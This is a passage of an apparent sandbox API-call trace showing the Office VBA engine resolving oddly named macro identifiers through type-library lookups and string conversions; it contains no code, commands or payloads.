WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.689] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.689] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.690] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.690] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.690] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.690] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.690] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.690] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.690] IUnknown:Release (This=0x665ba50) returned 0xd [0069.690] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.690] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.690] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817e2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="SA4A11") returned 7 [0069.690] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SA4A11", lHashVal=0x10e2db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817e2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="SA4A11") returned 7 [0069.690] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SA4A11", lHashVal=0x10e2db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817e2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="SA4A11") returned 7 [0069.690] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SA4A11", lHashVal=0x10e2db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.690] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SA4A11") returned 0x10e2db [0069.690] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="SA4A11" | out: _Dst="SA4A11") returned 0x0 [0069.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="SA4A11") returned 7 [0069.690] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.690] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SA4A11", lHashVal=0x10e2db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.691] IUnknown:Release (This=0x665ba50) returned 0xd [0069.691] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.691] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SA4A11", lHashVal=0x10e2db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.691] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.691] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.691] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SA4A11", lHashVal=0x10e2db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.691] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.691] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.691] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SA4A11", lHashVal=0x10e2db, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.691] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b817e2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="SA4A11") returned 7 [0069.691] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SA4A11", lHashVal=0x10e2db, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.691] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.691] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b817e2 | out: _Dst=0x67c2d40) returned 0x0 [0069.691] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SA4A11") returned 0x105d45 [0069.691] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_SA4A11" | out: _Dst="_B_var_SA4A11") returned 0x0 [0069.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_SA4A11") returned 14 [0069.691] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.691] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SA4A11", lHashVal=0x105d45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.691] IUnknown:Release (This=0x665ba50) returned 0xd [0069.691] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.691] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SA4A11", lHashVal=0x105d45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.691] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.691] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.691] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SA4A11", lHashVal=0x105d45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.691] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.691] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.691] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SA4A11", lHashVal=0x105d45, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.692] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.692] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.692] IUnknown:Release (This=0x665ba50) returned 0xd [0069.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870b5e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_SA4A11") returned 14 [0069.692] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SA4A11", lHashVal=0x105d45, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.692] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b817e2 | out: _Dst=0x144ec0) returned 0x0 [0069.692] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oA4QkcUk", lHashVal=0x103c64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA4QkcUk") returned 9 [0069.692] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oA4QkcUk", lHashVal=0x103c64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA4QkcUk") returned 9 [0069.692] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oA4QkcUk", lHashVal=0x103c64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.692] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oA4QkcUk") returned 0x103c64 [0069.692] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="oA4QkcUk" | out: _Dst="oA4QkcUk") returned 0x0 [0069.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="oA4QkcUk") returned 9 [0069.692] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.692] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oA4QkcUk", lHashVal=0x103c64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.692] IUnknown:Release (This=0x665ba50) returned 0xd [0069.692] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.692] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oA4QkcUk", lHashVal=0x103c64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.692] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.692] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.692] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oA4QkcUk", lHashVal=0x103c64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.692] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.693] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.693] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oA4QkcUk", lHashVal=0x103c64, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.693] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oA4QkcUk") returned 9 [0069.693] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oA4QkcUk", lHashVal=0x103c64, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.693] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.693] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b818da | out: _Dst=0x67c2d40) returned 0x0 [0069.693] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oA4QkcUk") returned 0x1013ed [0069.693] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_oA4QkcUk" | out: _Dst="_B_var_oA4QkcUk") returned 0x0 [0069.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_oA4QkcUk") returned 16 [0069.693] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.693] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oA4QkcUk", lHashVal=0x1013ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.693] IUnknown:Release (This=0x665ba50) returned 0xd [0069.693] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.693] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oA4QkcUk", lHashVal=0x1013ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.693] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.693] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.693] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oA4QkcUk", lHashVal=0x1013ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.693] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.693] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.693] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oA4QkcUk", lHashVal=0x1013ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.693] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.693] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.693] IUnknown:Release (This=0x665ba50) returned 0xd [0069.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870b8e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_oA4QkcUk") returned 16 [0069.693] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oA4QkcUk", lHashVal=0x1013ed, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0) returned 0x0 [0069.694] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b818da | out: _Dst=0x144ec0) returned 0x0 [0069.694] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IDAAAAc1", lHashVal=0x10323c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDAAAAc1") returned 9 [0069.694] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IDAAAAc1", lHashVal=0x10323c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDAAAAc1") returned 9 [0069.694] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IDAAAAc1", lHashVal=0x10323c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.694] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IDAAAAc1") returned 0x10323c [0069.694] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="IDAAAAc1" | out: _Dst="IDAAAAc1") returned 0x0 [0069.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="IDAAAAc1") returned 9 [0069.694] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.694] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IDAAAAc1", lHashVal=0x10323c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.694] IUnknown:Release (This=0x665ba50) returned 0xd [0069.694] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.694] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IDAAAAc1", lHashVal=0x10323c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.694] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.694] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.694] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IDAAAAc1", lHashVal=0x10323c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.694] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.694] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.694] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IDAAAAc1", lHashVal=0x10323c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.694] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b818ae, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="IDAAAAc1") returned 9 [0069.695] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IDAAAAc1", lHashVal=0x10323c, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.695] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.695] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b818ae | out: _Dst=0x67c2d40) returned 0x0 [0069.695] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IDAAAAc1") returned 0x1009c5 [0069.695] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_IDAAAAc1" | out: _Dst="_B_var_IDAAAAc1") returned 0x0 [0069.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_IDAAAAc1") returned 16 [0069.695] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.695] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IDAAAAc1", lHashVal=0x1009c5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.695] IUnknown:Release (This=0x665ba50) returned 0xd [0069.695] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.695] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IDAAAAc1", lHashVal=0x1009c5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.695] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.695] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.695] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IDAAAAc1", lHashVal=0x1009c5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.695] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.695] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.695] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IDAAAAc1", lHashVal=0x1009c5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.695] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.695] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.695] IUnknown:Release (This=0x665ba50) returned 0xd [0069.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870bbe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_IDAAAAc1") returned 16 [0069.695] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IDAAAAc1", lHashVal=0x1009c5, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.695] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b818ae | out: _Dst=0x144ec0) returned 0x0 [0069.696] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf17520, cb=0x400) returned 0xafa6b90 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81906, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KZk1Ux") returned 7 [0069.696] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KZk1Ux", lHashVal=0x10df75, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81906, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KZk1Ux") returned 7 [0069.696] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KZk1Ux", lHashVal=0x10df75, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81906, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KZk1Ux") returned 7 [0069.696] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KZk1Ux", lHashVal=0x10df75, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, 